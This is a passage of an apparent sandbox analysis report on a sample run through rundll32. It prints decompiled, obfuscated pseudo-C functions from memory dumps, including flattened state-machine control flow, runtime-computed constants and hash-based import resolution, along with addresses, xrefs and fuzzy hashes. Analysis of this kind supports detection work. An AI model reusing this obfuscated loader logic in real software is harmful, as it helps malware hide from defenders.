				} while (_t119 != 0x55f7722);
				goto L17;
			}

0x00b2153c
0x00b21546
0x00b21550
0x00b21558
0x00b2155d
0x00b21565
0x00b2156d
0x00b21575
0x00b2157d
0x00b21585
0x00b2158d
0x00b21595
0x00b2159d
0x00b215a5
0x00b215ad
0x00b215b5
0x00b215ba
0x00b215bf
0x00b215c7
0x00b215cf
0x00b215d7
0x00b215df
0x00b215e7
0x00b215ef
0x00b215f7
0x00b215ff
0x00b21604
0x00b21609
0x00b21611
0x00b21619
0x00b21626
0x00b2162a
0x00b2162c
0x00b21634
0x00b2163c
0x00b21644
0x00b2164c
0x00b21654
0x00b2165c
0x00b2166a
0x00b2166d
0x00b21675
0x00b21679
0x00b2167d
0x00b21685
0x00b2168d
0x00b21695
0x00b2169d
0x00b2169d
0x00b216af
0x00b2176c
0x00b2177c
0x00b2177f
0x00b21785
0x00b2178e
0x00b2179c
0x00b216b5
0x00b216bb
0x00b21733
0x00b2173b
0x00000000
0x00b216bd
0x00b216c3
0x00b21715
0x00b2171a
0x00b2171e
0x00b21720
0x00000000
0x00b21720
0x00b216c5
0x00b216cb
0x00b216f6
0x00b216fb
0x00b21700
0x00b21706
0x00000000
0x00b21706
0x00b216cd
0x00b216d3
0x00000000
0x00b216d9
0x00b216d9
0x00000000
0x00b216d9
0x00b216d3
0x00b216cb
0x00b216c3
0x00b216bb
0x00b217a0
0x00b217ab
0x00b217ab
0x00b21757
0x00b21759
0x00b2175e
0x00b2175e
0x00000000

Strings

i^%4, xrefs: 00B21720
Wx, xrefs: 00B215EF
i^%4, xrefs: 00B216C5

Memory Dump Source

Source File: 00000007.00000002.2107903712.0000000000B21000.00000020.00000001.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000007.00000002.2107895117.0000000000B20000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2107924836.0000000000B3C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_b20000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: Wx$i^%4$i^%4
API String ID: 0-1584002782
Opcode ID: 27d29786511c872af26309c852dc0a5908d1aeb1159e12b99986ab535e94628a
Instruction ID: ea3a4eb94a371e7a06fc1273b795658bc0baa38e433b73507d2fc39dd0cb7bf9
Opcode Fuzzy Hash: 27d29786511c872af26309c852dc0a5908d1aeb1159e12b99986ab535e94628a
Instruction Fuzzy Hash: 335147711083428BD398CE29D58942BBBE1FBD4758F140E5DF4AA962A0D7B4DA49CF83

Uniqueness

Uniqueness Score: -1.00%

Function 00B37D03, Relevance: 3.9, Strings: 3, Instructions: 127
COMMONCrypto

Download Yara Rule

C-Code - Quality: 93%

			E00B37D03() {
				signed int _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				intOrPtr _t105;
				intOrPtr _t112;
				signed int _t114;
				signed int _t115;
				signed int _t116;
				intOrPtr _t117;
				void* _t119;
				void* _t129;
				signed int* _t131;

				_t131 =  &_v44;
				_v8 = 0x68fc;
				_v8 = _v8 + 0xbb36;
				_v8 = _v8 ^ 0x000162e9;
				_v44 = 0xabcf;
				_t114 = 0x5a;
				_v44 = _v44 / _t114;
				_v44 = _v44 << 5;
				_t129 = 0x1aabdcf3;
				_v44 = _v44 ^ 0x41a75d37;
				_v44 = _v44 ^ 0x41a744f3;
				_v12 = 0xa837;
				_v12 = _v12 + 0xbdd3;
				_v12 = _v12 ^ 0x0001592e;
				_v36 = 0x1a64;
				_v36 = _v36 + 0x1ecf;
				_v36 = _v36 | 0x383b765c;
				_v36 = _v36 ^ 0x383b27b5;
				_v40 = 0x1cb7;
				_v40 = _v40 | 0xfad83379;
				_t115 = 0x73;
				_v40 = _v40 / _t115;
				_v40 = _v40 ^ 0x022e74ac;
				_v16 = 0x5673;
				_v16 = _v16 << 4;
				_v16 = _v16 ^ 0x00050551;
				_v20 = 0x8ddb;
				_v20 = _v20 + 0xffffc9bf;
				_t116 = 0x22;
				_v20 = _v20 * 0x54;
				_v20 = _v20 ^ 0x001c9060;
				_v24 = 0x24b0;
				_v24 = _v24 ^ 0x7eaabc9b;
				_v24 = _v24 ^ 0x558f972f;
				_v24 = _v24 ^ 0x2b251b7e;
				_v28 = 0xbf97;
				_v28 = _v28 + 0xffff41a2;
				_v28 = _v28 * 0x14;
				_v28 = _v28 ^ 0x00001fe8;
				_v32 = 0x3a57;
				_v32 = _v32 << 3;
				_v32 = _v32 ^ 0x30418ed0;
				_v32 = _v32 ^ 0x30407688;
				_v4 = 0xf5c8;
				_v4 = _v4 / _t116;
				_v4 = _v4 ^ 0x00000add;
				_t117 =  *0xb3ca30; // 0x0
				do {
					while(_t129 != 0x15241428) {
						if(_t129 == 0x1aabdcf3) {
							_push(_t117);
							_push(_t117);
							_t119 = 0x2c;
							_t117 = E00B28736(_t119);
							 *0xb3ca30 = _t117;
							if(_t117 != 0) {
								_t129 = 0x337355f8;
								continue;
							}
						} else {
							if(_t129 != 0x337355f8) {
								goto L8;
							} else {
								_push(_t117);
								_t112 = E00B259D5(_t117, _v36, _t117, _v40, _v16);
								_t117 =  *0xb3ca30; // 0x0
								_t131 =  &(_t131[5]);
								_t129 = 0x15241428;
								 *((intOrPtr*)(_t117 + 8)) = _t112;
								continue;
							}
						}
						goto L9;
					}
					_push(_t117);
					_t105 = E00B21132(_v20, _t117, _v24, _t117, 0, _v28, _v32, _v4, E00B2E377);
					_t117 =  *0xb3ca30; // 0x0
					_t131 =  &(_t131[9]);
					_t129 = 0x3afebe4c;
					 *((intOrPtr*)(_t117 + 0x18)) = _t105;
					L8:
				} while (_t129 != 0x3afebe4c);
				L9:
				return 0 | _t117 != 0x00000000;
			}

0x00b37d03
0x00b37d06
0x00b37d10
0x00b37d18
0x00b37d20
0x00b37d30
0x00b37d35
0x00b37d3b
0x00b37d40
0x00b37d45
0x00b37d52
0x00b37d5f
0x00b37d6c
0x00b37d74
0x00b37d7c
0x00b37d84
0x00b37d8c
0x00b37d94
0x00b37d9c
0x00b37da4
0x00b37db0
0x00b37db5
0x00b37dbb
0x00b37dc3
0x00b37dcb
0x00b37dd0
0x00b37dd8
0x00b37de0
0x00b37ded
0x00b37dee
0x00b37df2
0x00b37dfa
0x00b37e02
0x00b37e0a
0x00b37e12
0x00b37e1a
0x00b37e22
0x00b37e2f
0x00b37e33
0x00b37e3b
0x00b37e43
0x00b37e48
0x00b37e50
0x00b37e58
0x00b37e66
0x00b37e6a
0x00b37e72
0x00b37e78
0x00b37e78
0x00b37e82
0x00b37eb7
0x00b37eb8
0x00b37ebb
0x00b37ec3
0x00b37ec5
0x00b37ecd
0x00b37ecf
0x00000000
0x00b37ecf
0x00b37e84
0x00b37e86
0x00000000
0x00b37e88
0x00b37e88
0x00b37e96
0x00b37e9b
0x00b37ea1
0x00b37ea4
0x00b37ea6
0x00000000
0x00b37ea6
0x00b37e86
0x00000000
0x00b37e82
0x00b37ed3
0x00b37ef1
0x00b37ef6
0x00b37efc
0x00b37eff
0x00b37f01
0x00b37f04
0x00b37f04
0x00b37f0d
0x00b37f1a

Strings

\v;8, xrefs: 00B37D8C
W:, xrefs: 00B37E3B
sV, xrefs: 00B37DC3

Memory Dump Source

Source File: 00000007.00000002.2107903712.0000000000B21000.00000020.00000001.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000007.00000002.2107895117.0000000000B20000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2107924836.0000000000B3C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_b20000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: W:$\v;8$sV
API String ID: 0-492820393
Opcode ID: e6ea128346effe16f45d6d7b5197e7344b20a3d59c1ed596ca59c29b9b511462
Instruction ID: 2fc949b0cb2bf74e6c4c9ac97751927d95811aa0852f2d5539ad42f8dbd55fb6
Opcode Fuzzy Hash: e6ea128346effe16f45d6d7b5197e7344b20a3d59c1ed596ca59c29b9b511462
Instruction Fuzzy Hash: AE5188B15083419FD358CF25D88A81FBBE1FB88358F500A5DF486A62A0D7B5CA49CF87

Uniqueness

Uniqueness Score: -1.00%

Function 00B2E05A, Relevance: 3.9, Strings: 3, Instructions: 126
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E00B2E05A(void* __ecx, void* __edx) {
				intOrPtr _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed short _v40;
				signed int _v44;
				signed int _v48;
				signed int _t107;
				signed short _t113;
				signed short _t116;
				signed short _t118;
				signed int _t120;
				signed int _t121;
				signed int _t122;
				signed int _t123;
				intOrPtr _t124;
				signed short _t128;
				signed short* _t143;
				signed short _t145;
				void* _t146;
				signed int* _t147;

				_t147 =  &_v48;
				_v16 = 0x6d293b;
				_v12 = 0x468ef5;
				_v8 = 0;
				_v4 = 0;
				_t146 = __ecx;
				_v40 = 0x7b4e;
				_v40 = _v40 + 0xffff3b83;
				_v40 = _v40 + 0xffffa7a8;
				_v40 = _v40 ^ 0xffff5e78;
				_v20 = 0xb6a1;
				_t120 = 0x38;
				_v20 = _v20 / _t120;
				_v20 = _v20 ^ 0x00007f71;
				_v44 = 0x997f;
				_v44 = _v44 ^ 0xba9196e9;
				_v44 = _v44 ^ 0x66374254;
				_t26 =  &_v44; // 0x66374254
				_t121 = 0xe;
				_v44 =  *_t26 / _t121;
				_v44 = _v44 ^ 0x0fc29c0d;
				_v48 = 0x4c26;
				_v48 = _v48 | 0xfd76fef6;
				_v48 = _v48 >> 3;
				_v48 = _v48 ^ 0x1faed217;
				_v24 = 0xc5b2;
				_t122 = 0x42;
				_v24 = _v24 * 0x67;
				_v24 = _v24 << 9;
				_v24 = _v24 ^ 0x9f1566f7;
				_v28 = 0x55d;
				_v28 = _v28 << 0xb;
				_v28 = _v28 / _t122;
				_v28 = _v28 ^ 0x0000f55e;
				_v32 = 0x8f6f;
				_t123 = 6;
				_v32 = _v32 * 0x4f;
				_v32 = _v32 + 0xffffe8fc;
				_v32 = _v32 ^ 0x002c0f4c;
				_v36 = 0xd672;
				_v36 = _v36 / _t123;
				_v36 = _v36 + 0xffffc0a7;
				_v36 = _v36 ^ 0xffffa997;
				_t107 = _v40;
				_t124 =  *((intOrPtr*)(__edx + 0x78 + _t107 * 8));
				if(_t124 == 0 ||  *((intOrPtr*)(__edx + 0x7c + _t107 * 8)) == 0) {
					L13:
					return 1;
				} else {
					_t145 = _t124 + __ecx;
					while(1) {
						_t110 =  *((intOrPtr*)(_t145 + 0xc));
						if( *((intOrPtr*)(_t145 + 0xc)) == 0) {
							goto L13;
						}
						_t128 = E00B34AAF(_t110 + _t146, _v20, _v44, _v48);
						_v40 = _t128;
						__eflags = _t128;
						if(_t128 == 0) {
							L15:
							return 0;
						}
						_t143 =  *_t145 + _t146;
						_t118 =  *((intOrPtr*)(_t145 + 0x10)) + _t146;
						while(1) {
							_t113 =  *_t143;
							__eflags = _t113;
							if(__eflags == 0) {
								break;
							}
							if(__eflags >= 0) {
								_t115 = _t113 + 2 + _t146;
								__eflags = _t113 + 2 + _t146;
							} else {
								_t115 = _t113 & 0x0000ffff;
							}
							_t116 = E00B26228(_v24, _v28, _v32, _v36, _t128, _t115);
							_t147 =  &(_t147[4]);
							__eflags = _t116;
							if(_t116 == 0) {
								goto L15;
							} else {
								_t128 = _v40;
								_t143 =  &(_t143[2]);
								 *_t118 = _t116;
								_t118 = _t118 + 4;
								__eflags = _t118;
								continue;
							}
						}
						_t145 = _t145 + 0x14;
						__eflags = _t145;
					}
					goto L13;
				}
			}

0x00b2e05a
0x00b2e05d
0x00b2e065
0x00b2e075
0x00b2e07b
0x00b2e07f
0x00b2e081
0x00b2e089
0x00b2e091
0x00b2e099
0x00b2e0a1
0x00b2e0af
0x00b2e0b4
0x00b2e0ba
0x00b2e0c2
0x00b2e0ca
0x00b2e0d2
0x00b2e0da
0x00b2e0de
0x00b2e0e3
0x00b2e0e9
0x00b2e0f1
0x00b2e0f9
0x00b2e101
0x00b2e106
0x00b2e10e
0x00b2e11b
0x00b2e11e
0x00b2e122
0x00b2e127
0x00b2e12f
0x00b2e137
0x00b2e144
0x00b2e148
0x00b2e150
0x00b2e15d
0x00b2e15e
0x00b2e162
0x00b2e16a
0x00b2e172
0x00b2e180
0x00b2e184
0x00b2e18c
0x00b2e194
0x00b2e198
0x00b2e19e
0x00b2e21c
0x00000000
0x00b2e1a6
0x00b2e1a6
0x00b2e215
0x00b2e215
0x00b2e21a
0x00000000
0x00000000
0x00b2e1c1
0x00b2e1c3
0x00b2e1c7
0x00b2e1c9
0x00b2e227
0x00000000
0x00b2e227
0x00b2e1d0
0x00b2e1d2
0x00b2e20c
0x00b2e20c
0x00b2e20e
0x00b2e210
0x00000000
0x00000000
0x00b2e1d6
0x00b2e1e0
0x00b2e1e0
0x00b2e1d8
0x00b2e1d8
0x00b2e1d8
0x00b2e1f4
0x00b2e1f9
0x00b2e1fc
0x00b2e1fe
0x00000000
0x00b2e200
0x00b2e200
0x00b2e204
0x00b2e207
0x00b2e209
0x00b2e209
0x00000000
0x00b2e209
0x00b2e1fe
0x00b2e212
0x00b2e212
0x00b2e212
0x00000000
0x00b2e215

Strings

&L, xrefs: 00B2E0F1
;)m, xrefs: 00B2E05D
TB7f, xrefs: 00B2E0DA

Memory Dump Source

Source File: 00000007.00000002.2107903712.0000000000B21000.00000020.00000001.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000007.00000002.2107895117.0000000000B20000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2107924836.0000000000B3C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_b20000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: &L$;)m$TB7f
API String ID: 0-1597752287
Opcode ID: ccec81fc12bb8d59d6cf69cf5184f25956325339f73310d4cae82d3e58d50a0d
Instruction ID: 9da1fff0ccd0655246fd3fa20c53f811dea86614134cefc6def991f6188c6e80
Opcode Fuzzy Hash: ccec81fc12bb8d59d6cf69cf5184f25956325339f73310d4cae82d3e58d50a0d
Instruction Fuzzy Hash: D6518B716083028FD318CF26D88551BBBE1FFD4358F104A5DF4AA9A261D774DA4ACF86

Uniqueness

Uniqueness Score: -1.00%

Function 00B361B8, Relevance: 3.8, Strings: 3, Instructions: 77
COMMONCrypto

Download Yara Rule

C-Code - Quality: 97%

			E00B361B8(void* __ecx) {
				signed int _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				void* _t64;
				void* _t68;
				void* _t69;
				signed int _t71;
				void* _t75;
				void* _t76;
				signed int* _t78;

				_t78 =  &_v24;
				_v12 = 0x5dfc;
				_v12 = _v12 * 0x23;
				_t69 = __ecx;
				_v12 = _v12 << 7;
				_t75 = 0;
				_v12 = _v12 ^ 0x066cb215;
				_t76 = 0x1b4ca438;
				_v24 = 0xd6f7;
				_v24 = _v24 + 0xffffb773;
				_v24 = _v24 + 0xd9f1;
				_v24 = _v24 + 0xe528;
				_v24 = _v24 ^ 0x000200e6;
				_v16 = 0x64b4;
				_v16 = _v16 + 0xda3f;
				_v16 = _v16 >> 1;
				_v16 = _v16 >> 0xd;
				_v16 = _v16 ^ 0x0000725d;
				_v4 = 0xc8c2;
				_v4 = _v4 | 0x9945d150;
				_v4 = _v4 + 0x9caf;
				_v4 = _v4 ^ 0x99461e9f;
				_v20 = 0xe019;
				_t71 = 0x46;
				_v20 = _v20 / _t71;
				_v20 = _v20 >> 0xd;
				_v20 = _v20 >> 4;
				_v20 = _v20 ^ 0x00001f6d;
				_v8 = 0xf95b;
				_v8 = _v8 | 0x30645c78;
				_v8 = _v8 + 0xffff8663;
				_v8 = _v8 ^ 0x3064d0a8;
				do {
					while(_t76 != 0x108726d) {
						if(_t76 == 0x1b4ca438) {
							_t76 = 0x2a486598;
							continue;
						} else {
							if(_t76 == 0x2a486598) {
								_push(_t71);
								_t68 = E00B37F1B();
								_t78 =  &(_t78[1]);
								_t76 = 0x108726d;
								_t75 = _t75 + _t68;
								continue;
							}
						}
						goto L7;
					}
					_t71 = _v16;
					_t64 = E00B2D64E(_t71, _v4, _v20, _t69 + 4, _v8);
					_t78 =  &(_t78[3]);
					_t76 = 0xee7d46d;
					_t75 = _t75 + _t64;
					L7:
				} while (_t76 != 0xee7d46d);
				return _t75;
			}

0x00b361b8
0x00b361bb
0x00b361ce
0x00b361d2
0x00b361d4
0x00b361d9
0x00b361db
0x00b361e3
0x00b361e8
0x00b361f5
0x00b361fd
0x00b36205
0x00b3620d
0x00b36215
0x00b3621d
0x00b36225
0x00b36229
0x00b3622e
0x00b36236
0x00b3623e
0x00b36246
0x00b3624e
0x00b36256
0x00b36264
0x00b36267
0x00b3626b
0x00b36270
0x00b36275
0x00b3627d
0x00b36285
0x00b3628d
0x00b36295
0x00b3629d
0x00b3629d
0x00b362ab
0x00b362cb
0x00000000
0x00b362ad
0x00b362af
0x00b362b9
0x00b362ba
0x00b362bf
0x00b362c2
0x00b362c7
0x00000000
0x00b362c7
0x00b362af
0x00000000
0x00b362ab
0x00b362df
0x00b362e3
0x00b362e8
0x00b362eb
0x00b362f0
0x00b362f2
0x00b362f2
0x00b36303

Strings

(, xrefs: 00B36205
]r, xrefs: 00B3622E
x\d0, xrefs: 00B36285

Memory Dump Source

Source File: 00000007.00000002.2107903712.0000000000B21000.00000020.00000001.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000007.00000002.2107895117.0000000000B20000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2107924836.0000000000B3C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_b20000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: ($]r$x\d0
API String ID: 0-3053701899
Opcode ID: 51c1d68f1b448b9cd01a0670611b7d4582907cb0fec310406faa2fe7817289f3
Instruction ID: 857aaa5dee97bd8f8b339f9e85a584c836d1fb6840510b4fc6cfc687be577365
Opcode Fuzzy Hash: 51c1d68f1b448b9cd01a0670611b7d4582907cb0fec310406faa2fe7817289f3
Instruction Fuzzy Hash: B13184B28083429FD314DE14D88901BBBE0FBE4718F104E9DF499A6261E379CE088B93

Uniqueness

Uniqueness Score: -1.00%

Function 00B30B68, Relevance: 3.8, Strings: 3, Instructions: 75
COMMONCrypto

Download Yara Rule

C-Code - Quality: 83%

			E00B30B68(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				void* _t76;

				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E00B2602B(_t76);
				_v16 = 0x6860;
				_v16 = _v16 * 0x5b;
				_v16 = _v16 ^ 0xdc6b4abd;
				_v16 = _v16 ^ 0xdc4e778c;
				_v32 = 0xa230;
				_v32 = _v32 << 0xe;
				_v32 = _v32 ^ 0x288c6565;
				_v8 = 0xfe44;
				_v8 = _v8 | 0x4c3583fb;
				_v8 = _v8 + 0xfffff685;
				_v8 = _v8 ^ 0x61a5c761;
				_v8 = _v8 ^ 0x2d906c10;
				_v40 = 0xe5db;
				_v40 = _v40 | 0x9b65f6ba;
				_v40 = _v40 ^ 0x9b65d356;
				_v20 = 0x9adf;
				_v20 = _v20 + 0x49d9;
				_v20 = _v20 + 0xffff68ea;
				_v20 = _v20 ^ 0x00005968;
				_v36 = 0x94a7;
				_v36 = _v36 ^ 0xf3da6fb3;
				_v36 = _v36 ^ 0xf3dae7d2;
				_v28 = 0xd25a;
				_v28 = _v28 + 0x1e41;
				_v28 = _v28 | 0x2f85fa9d;
				_v28 = _v28 ^ 0x2f85d3ee;
				_v12 = 0x5326;
				_v12 = _v12 ^ 0x0ede0c0e;
				_v12 = _v12 >> 7;
				_v12 = _v12 << 4;
				_v12 = _v12 ^ 0x01db8a0a;
				_v24 = 0x6b2;
				_v24 = _v24 << 4;
				_v24 = _v24 | 0x9aa17d8a;
				_t63 =  &_v24;
				_v24 = _v24 ^ 0x9aa13f42;
				_push(_v32);
				_t91 = E00B3889D(0xb3c0b0, _v16,  *_t63);
				E00B2C680(__ecx, _v40, _v20, 0xb3c0b0, _v36, _a12, _t79, _a4);
				return E00B32025(_v28, _t91, _v12, _v24);
			}

0x00b30b70
0x00b30b75
0x00b30b78
0x00b30b7b
0x00b30b7c
0x00b30b7d
0x00b30b82
0x00b30b92
0x00b30b95
0x00b30b9c
0x00b30ba3
0x00b30baa
0x00b30bae
0x00b30bb5
0x00b30bbc
0x00b30bc3
0x00b30bca
0x00b30bd1
0x00b30bd8
0x00b30bdf
0x00b30be6
0x00b30bed
0x00b30bf4
0x00b30bfb
0x00b30c02
0x00b30c09
0x00b30c10
0x00b30c17
0x00b30c1e
0x00b30c25
0x00b30c2c
0x00b30c33
0x00b30c3a
0x00b30c41
0x00b30c48
0x00b30c4c
0x00b30c50
0x00b30c57
0x00b30c5e
0x00b30c62
0x00b30c69
0x00b30c69
0x00b30c70
0x00b30c7e
0x00b30c96
0x00b30cb3

Strings

hY, xrefs: 00B30C02
`h, xrefs: 00B30B82
&S, xrefs: 00B30C3A

Memory Dump Source

Source File: 00000007.00000002.2107903712.0000000000B21000.00000020.00000001.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000007.00000002.2107895117.0000000000B20000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2107924836.0000000000B3C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_b20000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: &S$`h$hY
API String ID: 0-860638928
Opcode ID: 12a0b283e3f87a32192ed4c379f2864844a6232d11ce28d04b0c71091f8881b0
Instruction ID: 72b58d67e67961fd710e921280ca55c9119e57d762e593fe6d7abfb4765a0e7b
Opcode Fuzzy Hash: 12a0b283e3f87a32192ed4c379f2864844a6232d11ce28d04b0c71091f8881b0
Instruction Fuzzy Hash: 52312EB1C00219EBDF49CFA1C98A8EEBFB1FB44314F208198E41276260D7B94A65DF95

Uniqueness

Uniqueness Score: -1.00%

Function 10033D2D, Relevance: 2.8, APIs: 1, Instructions: 1337COMMON

Download Yara Rule

APIs

__floor_pentium4.LIBCMT ref: 10033DC1

Memory Dump Source

Source File: 00000007.00000002.2112853162.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2112844322.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2113030372.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2113073198.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2113096062.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID: __floor_pentium4
String ID:
API String ID: 4168288129-0
Opcode ID: 2c998c506e262c4253563a977a4d92619d14240c01dde0327c46d456d559eee2
Instruction ID: 0a7772f46e48d921beee7038d25414e7cf36a6fcd0ae478fc61cfa634bde4a5c
Opcode Fuzzy Hash: 2c998c506e262c4253563a977a4d92619d14240c01dde0327c46d456d559eee2
Instruction Fuzzy Hash: 2FC22D75E046298FDB66CE28DC807DAB7F5EB45346F1641EAD40DEB240EB34AE818F41

Uniqueness

Uniqueness Score: -1.00%

Function 00B35A61, Relevance: 2.7, Strings: 2, Instructions: 155
COMMONCrypto

Download Yara Rule

C-Code - Quality: 68%

			E00B35A61(void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v556;
				signed int _v560;
				signed int _v564;
				signed int _v568;
				signed int _v572;
				signed int _v576;
				signed int _v580;
				signed int _v584;
				signed int _v588;
				signed int _v592;
				signed int _v596;
				signed int _v600;
				void* __ecx;
				void* _t115;
				signed int _t129;
				void* _t136;
				void* _t156;
				signed int _t157;
				signed int _t158;
				signed int _t159;
				signed int* _t163;

				_push(_a16);
				_t156 = __edx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				E00B2602B(_t115);
				_v564 = 0x4767;
				_t163 =  &(( &_v600)[6]);
				_v564 = _v564 << 9;
				_v564 = _v564 ^ 0x008e895f;
				_t136 = 0x30c826c8;
				_v588 = 0x30cc;
				_v588 = _v588 + 0x4702;
				_t157 = 0x63;
				_v588 = _v588 / _t157;
				_v588 = _v588 + 0xb80e;
				_v588 = _v588 ^ 0x0000cf36;
				_v596 = 0xadf;
				_t158 = 0x66;
				_v596 = _v596 * 0x61;
				_v596 = _v596 / _t158;
				_t159 = 0x4c;
				_v596 = _v596 / _t159;
				_v596 = _v596 ^ 0x0000541c;
				_v592 = 0x64b0;
				_v592 = _v592 * 0x15;
				_v592 = _v592 + 0xa35f;
				_v592 = _v592 >> 0xe;
				_v592 = _v592 ^ 0x0000251e;
				_v600 = 0x3c82;
				_v600 = _v600 | 0xdba50be5;
				_v600 = _v600 ^ 0x0661176e;
				_v600 = _v600 + 0x2491;
				_v600 = _v600 ^ 0xddc40dba;
				_v572 = 0x6631;
				_v572 = _v572 + 0xffff287e;
				_v572 = _v572 + 0x2e34;
				_v572 = _v572 ^ 0xffff8a80;
				_v584 = 0x3cf9;
				_v584 = _v584 ^ 0x209cd78c;
				_v584 = _v584 ^ 0x88ea975c;
				_v584 = _v584 | 0x088f8ebb;
				_v584 = _v584 ^ 0xa8ffe4fe;
				_v560 = 0x5a99;
				_v560 = _v560 << 2;
				_v560 = _v560 ^ 0x0001627e;
				_v576 = 0xc549;
				_v576 = _v576 * 0x36;
				_v576 = _v576 + 0xffff72cb;
				_v576 = _v576 ^ 0x00296382;
				_v568 = 0xc477;
				_v568 = _v568 + 0xffff852d;
				_v568 = _v568 ^ 0x00000bf7;
				_t160 = _v568;
				_v580 = 0xe5ab;
				_v580 = _v580 + 0x26f9;
				_v580 = _v580 + 0xffffb6c9;
				_v580 = _v580 ^ 0x0000c36f;
				do {
					while(_t136 != 0x96b3cdc) {
						if(_t136 == 0xc60f3b0) {
							_t129 = E00B39AC7(_v572, _v584,  &_v556, _v560, _t160);
							_t163 =  &(_t163[3]);
							L11:
							asm("sbb ecx, ecx");
							_t136 = ( ~_t129 & 0xe09a757b) + 0x28d0c761;
							continue;
						}
						if(_t136 == 0x1f7f9ad4) {
							_v556 = 0x22c;
							_t129 = E00B276F7( &_v556, _v592, _v600, _t160);
							goto L11;
						}
						if(_t136 == 0x28d0c761) {
							return E00B34F7D(_v576, _v568, _t160);
						}
						if(_t136 != 0x2dc3f3d6) {
							if(_t136 != 0x30c826c8) {
								goto L16;
							} else {
								_t136 = 0x2dc3f3d6;
								continue;
							}
							L19:
							return _t129;
						}
						_t129 = E00B21C88(_t136, _t136, _v580);
						_t160 = _t129;
						_t163 =  &(_t163[3]);
						if(_t129 != 0xffffffff) {
							_t136 = 0x1f7f9ad4;
							continue;
						}
						goto L19;
					}
					_push(_t156);
					_push( &_v556);
					if(_a4() == 0) {
						_t136 = 0x28d0c761;
						goto L16;
					} else {
						_t136 = 0xc60f3b0;
						continue;
					}
					goto L19;
					L16:
				} while (_t136 != 0x22b9bf83);
				return _t129;
			}

0x00b35a6b
0x00b35a72
0x00b35a74
0x00b35a7b
0x00b35a82
0x00b35a89
0x00b35a8b
0x00b35a90
0x00b35a98
0x00b35a9b
0x00b35aa2
0x00b35aaa
0x00b35aaf
0x00b35abc
0x00b35acf
0x00b35ad4
0x00b35ada
0x00b35ae2
0x00b35aea
0x00b35af7
0x00b35afa
0x00b35b06
0x00b35b0e
0x00b35b11
0x00b35b15
0x00b35b1d
0x00b35b2a
0x00b35b2e
0x00b35b36
0x00b35b3b
0x00b35b43
0x00b35b4b
0x00b35b53
0x00b35b5b
0x00b35b63
0x00b35b6b
0x00b35b73
0x00b35b7b
0x00b35b83
0x00b35b8b
0x00b35b93
0x00b35b9b
0x00b35ba3
0x00b35bab
0x00b35bb3
0x00b35bbb
0x00b35bc0
0x00b35bc8
0x00b35bd5
0x00b35bd9
0x00b35be1
0x00b35be9
0x00b35bf1
0x00b35bf9
0x00b35c01
0x00b35c05
0x00b35c0d
0x00b35c15
0x00b35c1d
0x00b35c25
0x00b35c25
0x00b35c33
0x00b35cd1
0x00b35cd6
0x00b35cac
0x00b35cb0
0x00b35cb8
0x00000000
0x00b35cb8
0x00b35c3f
0x00b35c9d
0x00b35ca5
0x00000000
0x00b35cab
0x00b35c43
0x00000000
0x00b35d11
0x00b35c4f
0x00b35c57
0x00000000
0x00b35c5d
0x00b35c5d
0x00000000
0x00b35c5d
0x00b35d1c
0x00b35d1c
0x00b35d1c
0x00b35c76
0x00b35c7b
0x00b35c7d
0x00b35c83
0x00b35c89
0x00000000
0x00b35c89
0x00000000
0x00b35c83
0x00b35cdb
0x00b35ce0
0x00b35cea
0x00b35cf3
0x00000000
0x00b35cec
0x00b35cec
0x00000000
0x00b35cec
0x00000000
0x00b35cf5
0x00b35cf5
0x00000000

Strings

4., xrefs: 00B35B7B
gG, xrefs: 00B35A90

Memory Dump Source

Source File: 00000007.00000002.2107903712.0000000000B21000.00000020.00000001.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000007.00000002.2107895117.0000000000B20000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2107924836.0000000000B3C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

